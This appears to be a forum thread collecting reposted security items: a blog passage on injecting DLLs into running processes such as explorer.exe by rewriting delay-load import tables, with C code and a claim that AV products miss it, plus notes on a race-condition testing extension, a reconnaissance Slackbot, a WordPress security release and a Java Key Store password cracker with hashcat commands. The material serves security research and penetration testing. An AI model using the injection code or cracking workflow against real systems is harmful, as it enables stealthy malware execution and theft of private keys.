pseudo IAT as both executable and writable: 1 2 3 4 0:011> !vprot 00060000+0001839c BaseAddress: 00371000 AllocationBase: 00060000 AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another additional twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state: 1 2 3 4 5 6 7 00741044 00726afa explorer!_imp_load__UnInitProcessPriv 00741048 7467f845 DUI70!InitThread 0074104c 00726b0f explorer!_imp_load__UnInitThread 00741050 74670728 DUI70!InitProcessPriv 0:022> lm m DUI70 start end module name 74630000 746e2000 DUI70 (pdb symbols) In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn’t loaded, it will be null. So when a delayed function is invoked that’s already loaded, the delay helper function will check it’s entry to determine if a handle to it can be used: 1 2 3 4 5 6 7 8 HMODULE hmod = *idd.phmod; if (hmod == 0) { if (__pfnDliNotifyHook2) { hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli))); } if (hmod == 0) { hmod = ::LoadLibraryEx(dli.szDll, NULL, 0); } The idd structure is just an instance of the InternalImgDelayDescr described above and passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from delay entry, then it uses that handle instead. It does NOT attempt to LoadLibrary irregardless of this value; this can be used to our advantage. Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample. Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you’d expect it, so we won’t be touching on it here. Limitations Before detailing how we might abuse this (though it should be fairly obvious), it’s important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so. The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well supported function of the portable executable, and exists today on modern systems. Another limitation is that, because at it’s core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, but none of which use LoadLibrary…). In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you’re using the suspended process/new process strategy, but may not be trivial on running applications. Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to be employing this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share. Abuse When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process. The running remote process is an interesting case with several caveats that we’ll explore below. I won’t detail suspended processes, as it’s essentially the same as a running process, but easier. It’s easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3]. Local Process The local process is the most simple and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though. The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio. With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 IMAGE_DELAYLOAD_DESCRIPTOR* findDelayEntry(char *cDllName) { PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL); PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew); PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos + pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress); DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL); IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL; // iterate over entries for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){ char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA); if (strcmp(_cDllName, cDllName) == 0){ pImgResult = entry; break; } } return pImgResult; } Should be pretty clear what we’re doing here. Once we’ve got the correct table entry, we need to mark the entry’s DllName as writable, overwrite it with our custom DLL name, and restore the protection mask: 1 2 3 4 5 IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll"); DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA); VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect); WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes); VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect); Now all that’s left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary. Remote Process The most interesting of cases is the running remote process. For demonstration here, we’ll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user. With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and it’s directories, and locate the appropriate delay entry we’re targeting. This part is likely to prove the most unfriendly when attempting to port this to another process; what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it’s delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected. When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer. The code for this is pretty simple: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 HRESULT hResult = S_FALSE; IShellDispatch *pIShellDispatch = NULL; CoInitialize(NULL); hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (void**)&pIShellDispatch); if (SUCCEEDED(hResult)) { pIShellDispatch->EjectPC(); pIShellDispatch->Release(); } CoUninitialize(); Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection. Remote Process – All Fixed One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost. Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it’s null, it attempts to load it, if it’s not, it uses that handle. We can abuse this check by nulling out the module handle, thereby “tricking” the helper function into once again loading that descriptor’s DLL. In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again. In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name. Conclusions I should make mention that I tested this strategy across several next gen AV/HIPS appliances, which will go unnamed here, and none where able to detect the cross process injection strategy. It would seem overall to be an interesting challenge at detection; in remote processes, the strategy uses the following chain of calls: 1 2 3 4 5 6 7 8 OpenProcess(..); ReadRemoteProcess(..); // read image ReadRemoteProcess(..); // read delay table ReadRemoteProcess(..); // read delay entry 1...n VirtualProtectEx(..); WriteRemoteProcess(..); That’s it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies. The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn’t production quality; beware, here be dragons. Special thanks to Stephen Breen for reviewing this post References [0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process [1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx [2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx [3] https://github.com/hatRiot/DelayLoadInject [4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx Posted by Bryan Alexander Sep 19th, 2017 Sursa: http://hatriot.github.io/blog/2017/09/19/abusing-delay-load-dll/
-
Sakurity Racer This 128 LOC extension works pretty much as a "Make Money" button if used properly. LEGAL: Use at your own risk and only with your own projects. Do not use it against anyone else. Load this unpacked extension into your Chrome. We didn't upload it to the Chrome Store because for best results you need to run your own racer.js server anyway. See the circle on the right? It's the sniffer button. Once you click it, for next 3 seconds all requests (except ignored ones like OPTIONS) will be blocked and sent to specified default_server location where racer.js is running. Racer.js will get exact same request you were about to make along with all credentials and cookies and will repeat it to the victim in parallel (5 by default). That can trigger a race condition. No luck? Do it a few times because most race conditions are hard to reproduce. For basic tests you can run racer.js on your localhost and that will be used by default. For real pentest run it on a server as close to the victim as possible and change default_server inside sniffer.js. Best functionality to pentest: financial transfers, vouchers, discount codes, trade/withdraw functions and other actions that you're supposed to do limited amount of times. It doesn't cover all scenarios such as timed race conditions or when you need to run few different requests to achieve the result. Sursa: https://github.com/sakurity/racer
-
- 2
-
-
-
Kubebot: A Kubernetes Based Security Testing Slackbot Posted: 13 hours ago by @pentestit Leave a Comment 384 views About a week ago, I blogged about List of Portable Hardware Devices for Penetration Testing. The tool that I am blogging about today – Kubebot – can be an awesome example and be installed very easily on a Raspberry Pi that you have lying around. Best part is that this is open source and can be customized to do anything you want. What is Kubebot? Kubebot is an open source security testing Slackbot in the Go programming language, with a Kubernetes backend on the Google Cloud Platform. All of us know that Kubernetes is an open-source system for automating deployment, scaling, and management of dockerized applications. We also know that running tasks such as reconnaissance on a target network is almost always time-consuming and cumbersome. If you have a tool like Kubebot to help, you can use the time it does it’s stuff to concentrate on other important stuff. It dockerizes a lot of useful tools that help you perform reconnaissance on a target. List of tools included with Kubebot: Enumall: This is a custom implementation of the Enumall script by the author. It helps you identify subdomains using several techniques that relies on services such as threatcrowd, Bing, Shodan, HackerTraget and the famous Recon-NG. git-all-secrets: git-all-secrets is an open source tool by the author @anshuman_bh to capture all the GIT secrets by leveraging multiple open source GIT searching tools. Gitrob: Gitrob is an open source, command line tool which can help organizations and security professionals find sensitive information lingering in publicly available files on GitHub. git-secrets: The git-secrets open source tool scans commits, commit messages and alerts you of sensitive data that has been found. Gobuster: Gobuster is a tool used to brute-force URIs (directories and files) in web sites and DNS subdomains (with wildcard support). Nmap: All of us already know that Nmap aka Network Mapper is a free and open source utility for network discovery and security auditing. SubBrute: SubBrute is a DNS meta-query spider that enumerates DNS records, and subdomains. Sublist3r: Sublist3r is an open source python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting by enumerateing subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS. SubBrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. truffleHog: truffleHog is an open source tool that searches through GIT repositories for high entropy strings, digging deep into commit history and branches. This is effective at finding secrets accidentally committed that contain high entropy. Wfuzz: Wfuzz is a tool designed to brute force web applications. As of now, only basic authentication brute forcing has been implemented in Kubebot. Support for tools such as Metasploit is being worked upon. Installing the tool though lengthy, is a lot easy. Download Kubebot: Installation instruction along with it’s pre-requisites can be found here. You can check out the Kubebot GIT repository from here. Sursa: http://pentestit.com/kubebot-kubernetes-based-security-testing-slackbot/
-
Cure53 Browser Security White Paper Welcome to the code repository for the Cure53 Browser Security White Paper! This is the right place to leave comments and file bugs in case we got something wrong. The latest version of the PDF will be available here as well. Expect frequent updates for smaller fixes and adjustments. Sursa: https://github.com/cure53/browser-sec-whitepaper
-
- 1
-
-
WordPress 4.8.2 Security and Maintenance Release Posted September 19, 2017 by Aaron D. Campbell. Filed under Releases, Security. WordPress 4.8.2 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. WordPress versions 4.8.1 and earlier are affected by these security issues: $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi). WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability. Reported by Slavco A cross-site scripting (XSS) vulnerability was discovered in the oEmbed discovery. Reported by xknown of the WordPress Security Team. A cross-site scripting (XSS) vulnerability was discovered in the visual editor. Reported by Rodolfo Assis (@brutelogic) of Sucuri Security. A path traversal vulnerability was discovered in the file unzipping code. Reported by Alex Chapman (noxrnet). A cross-site scripting (XSS) vulnerability was discovered in the plugin editor. Reported by 陈瑞琦 (Chen Ruiqi). An open redirect was discovered on the user and term edit screens. Reported by Yasin Soliman (ysx). A path traversal vulnerability was discovered in the customizer. Reported by Weston Ruter of the WordPress Security Team. A cross-site scripting (XSS) vulnerability was discovered in template names. Reported by Luka (sikic). A cross-site scripting (XSS) vulnerability was discovered in the link modal. Reported by Anas Roubi (qasuar). Thank you to the reporters of these issues for practicing responsible disclosure. In addition to the security issues above, WordPress 4.8.2 contains 6 maintenance fixes to the 4.8 release series. For more information, see the release notes or consult the list of changes. Download WordPress 4.8.2 or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.8.2. Thanks to everyone who contributed to 4.8.2. Sursa: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
-
JKS private key cracker - Nail in the JKS coffin The Java Key Store (JKS) is the Java way of storing one or several cryptographic private and public keys for asymmetric cryptography in a file. While there are various key store formats, Java and Android still default to the JKS file format. JKS is one of the file formats for Java key stores, but JKS is confusingly used as the acronym for the general Java key store API as well. This project includes information regarding the security mechanisms of the JKS file format and how the password protection of the private key can be cracked. Due the unusual design of JKS the developed implementation can ignore the key store password and crack the private key password directly. Because it ignores the key store password, this implementation can attack every JKS configuration, which is not the case with most other tools. By exploiting a weakness of the Password Based Encryption scheme for the private key in JKS, passwords can be cracked very efficiently. Until now, no public tool was available exploiting this weakness. This technique was implemented in hashcat to amplify the efficiency of the algorithm with higher cracking speeds on GPUs. To get the theory part, please refer to the POC||GTFO article "15:12 Nail in the Java Key Store Coffin" in issue 0x15 included in this repository (pocorgtfo15.pdf) or available on various mirros like this beautiful one: https://unpack.debug.su/pocorgtfo/ Before you ask: JCEKS or BKS or any other Key Store format is not supported (yet). How you should crack JKS files The answer is build your own cracking hardware for it . But let's be a little more practical, so the answer is using your GPU: _____: _____________ _____: v3.6.0 ____________ _\ |__\______ _/_______ _\ |_____ _______\______ /__ ______ | _ | __ \ ____/____ _ | ___/____ __ |_______/ | | | \ _\____ / | | \ / \ | | |_____| |______/ / /____| |_________/_________: | |_____:-aTZ!/___________/ |_____: /_______: * BLAKE2 * BLOCKCHAIN2 * DPAPI * CHACHA20 * JAVA KEYSTORE * ETHEREUM WALLET * All you need to do is run the following command: java -jar JksPrivkPrepare.jar your_JKS_file.jks > hash.txt If your hash.txt ends up being empty, there is either no private key in the JKS file or you specified a non-JKS file. Then feed the hash.txt file to hashcat (version 3.6.0 and above), for example like this: $ ./hashcat -m 15500 -a 3 -1 '?u|' -w 3 hash.txt ?1?1?1?1?1?1?1?1?1 hashcat (v3.6.0) starting... OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 1080, 2026/8107 MB allocatable, 20MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Applicable optimizers: * Zero-Byte * Precompute-Init * Not-Iterated * Appended-Salt * Single-Hash * Single-Salt * Brute-Force Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 75c $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test:POC||GTFO Session..........: hashcat Status...........: Cracked Hash.Type........: JKS Java Key Store Private Keys (SHA1) Hash.Target......: $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test Time.Started.....: Tue May 30 17:41:58 2017 (8 mins, 25 secs) Time.Estimated...: Tue May 30 17:50:23 2017 (0 secs) Guess.Mask.......: ?1?1?1?1?1?1?1?1?1 [9] Guess.Charset....: -1 ?u|, -2 Undefined, -3 Undefined, -4 Undefined Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 7946.6 MH/s (39.48ms) Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 4014116700160/7625597484987 (52.64%) Rejected.........: 0/4014116700160 (0.00%) Restore.Point....: 5505024000/10460353203 (52.63%) Candidates.#1....: NNVGFSRFO -> Z|ZFVDUFO HWMon.Dev.#1.....: Temp: 75c Fan: 89% Util:100% Core:1936MHz Mem:4513MHz Bus:1 Started: Tue May 30 17:41:56 2017 Stopped: Tue May 30 17:50:24 2017 So from this repository you basically only need the JksPrivkPrepare.jar to run a cracking session. Other things in this repository test_run.sh: A little test script that you should be able to run after a couple of minutes to see this project in action. It includes comments on how to setup the dependencies for this project. benchmarking: tests that show why you should use this technique and not others. Please read the "Nail in the JKS coffin" article. example_jks: generate example JKS files fingerprint_creation: Every plaintext private key in PKCS#8 has it's own "fingerprint" that we expect when we guess the correct password. These fingerprints are necessary to make sure we are able to detect when we guessed the correct password. Please read the "Nail in the JKS coffin" article. This folder has the code to generate these fingerprints, it's a little bit hacky but I don't expect that it will be necessary to add any other fingerprints ever. JksPrivkPrepare: The source code of how the JKS files are read and the hash calculated we need to give to hashcat. jksprivk_crack.py: A proof of concept implementation that can be used instead of hashcat. Obviously this is much slower than hashcat, but it can outperform John the Ripper (JtR) in certain cases. Please read the "Nail in the JKS coffin" article. jksprivk_decrypt.py: A little helper script that can be used to extract a private key once the password was correctly guessed. run_example_jks.sh: A script that runs JksPrivkPrepare.jar and jksprivk_crack.py on all example JKS files in the example_jks folder. Make sure you run the generate_examples.py in example_jks script before. Related work and further links A big shout to Casey Marshall who wrote the JKS.java class, which is used in a modified version in this project: /* JKS.java -- implementation of the "JKS" key store. Copyright (C) 2003 Casey Marshall <rsdio@metastatic.org> Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation. No representations are made about the suitability of this software for any purpose. It is provided "as is" without express or implied warranty. This program was derived by reverse-engineering Sun's own implementation, using only the public API that is available in the 1.4.1 JDK. Hence nothing in this program is, or is derived from, anything copyrighted by Sun Microsystems. While the "Binary Evaluation License Agreement" that the JDK is licensed under contains blanket statements that forbid reverse-engineering (among other things), it is my position that US copyright law does not and cannot forbid reverse-engineering of software to produce a compatible implementation. There are, in fact, numerous clauses in copyright law that specifically allow reverse-engineering, and therefore I believe it is outside of Sun's power to enforce restrictions on reverse-engineering of their software, and it is irresponsible for them to claim they can. */ Various more information which are mentioned in the article as well: JKS is going to be replace as the default type in Java 9 http://openjdk.java.net/jeps/229 https://gist.github.com/zach-klippenstein/4631307 http://www.openwall.com/lists/john-users/2015/06/07/3 https://github.com/bes/KeystoreBrute https://github.com/jeffers102/KeystoreCracker https://github.com/volure/keystoreBrute https://gist.github.com/robinp/2143870 https://www.darknet.org.uk/2015/06/patator-multi-threaded-service-url-brute-forcing-tool/ https://github.com/rsertelon/android-keystore-recovery https://github.com/MaxCamillo/android-keystore-password-recover https://cryptosense.com/mighty-aphrodite-dark-secrets-of-the-java-keystore/ https://hashcat.net/events/p12/js-sha1exp_169.pdf https://github.com/hashcat/hashcat Neighborly greetings go out to atom, vollkorn, cem, doegox, corkami, xonox and rexploit for supporting this research in one form or another! Sursa: https://github.com/floyd-fuh/JKS-private-key-cracker-hashcat